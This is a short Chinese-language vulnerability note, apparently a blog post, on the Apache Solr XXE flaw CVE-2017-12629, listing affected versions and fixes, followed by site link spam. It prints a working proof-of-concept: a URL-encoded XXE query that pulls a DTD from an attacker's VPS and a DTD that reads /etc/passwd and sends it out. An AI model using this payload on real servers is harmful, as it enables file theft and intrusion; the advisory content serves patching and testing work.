Apache solr XML 实体注入漏洞

描述:

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。

范围:

Apache solr<7.1.0 版本

利用:

可参考:https://vulhub.org/#/environments/solr/CVE-2017-12629-XXE/

以及:https://blog.csdn.net/yangbz123/article/details/117827547

修复:

升级更高版本

添加Solr访问控制,包括禁止本地直接未授权访问

修改相关java文件

Poc:
复制代码

/solr/demo/select?q=%3C%3Fxml%20version%3D%221.0%22%20%3F%3E%3C!DOCTYPE%20root%5B%3C!ENTITY%20%25%20ext%20SYSTEM%20%22http%3A%2F%2Fxxx.xxx.xxx.xxx%2Fapachesolrxxe.dtd%22%3E%25ext%3B%25ent%3B%5D%3E%3Cr%3E%26data%3B%3C%2Fr%3E&wt=xml&defType=xmlparser 其中xxx.xxx.xxx.xxx为vps的ip地址 apachesolrxxe.dtd为dtd文件名

复制代码

vps中dtd文件内容:

复制代码

<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

相关推荐
SeaTunnel3 小时前
Apache SeaTunnel 2.3.10 正式发布 —— 全新功能与多项改进,助力数据集成再升级!
apache
路由侠内网穿透3 小时前
本地部署开源流处理框架 Apache Flink 并实现外部访问
大数据·网络协议·tcp/ip·flink·服务发现·apache·consul
努力搬砖的咸鱼4 小时前
Qt中的数据解析--XML与JSON处理全攻略
xml·开发语言·qt·json
inxunoffice4 小时前
批量删除 txt/html/json/xml/csv 等文本文件中的重复行
xml
andy55206 小时前
.NET 使用 WMQ 连接Queue 发送 message 实例
xml·c#·wmq·c# 连接wmq·发送消息到wmq
迷失蒲公英7 小时前
在线XML转义工具
xml·xml转义
xiaoduyyy1 天前
【Android】View动画—XML动画、帧动画
android·xml
inxunoffice1 天前
导入 Excel 规则批量修改 txt/html/json/xml/csv 等记事本文本文件内容
xml·excel
inxunoffice1 天前
批量删除 txt/html/json/xml/csv 等文本文件空白行
xml
NaZiMeKiY1 天前
基于XML方式Bean的配置
xml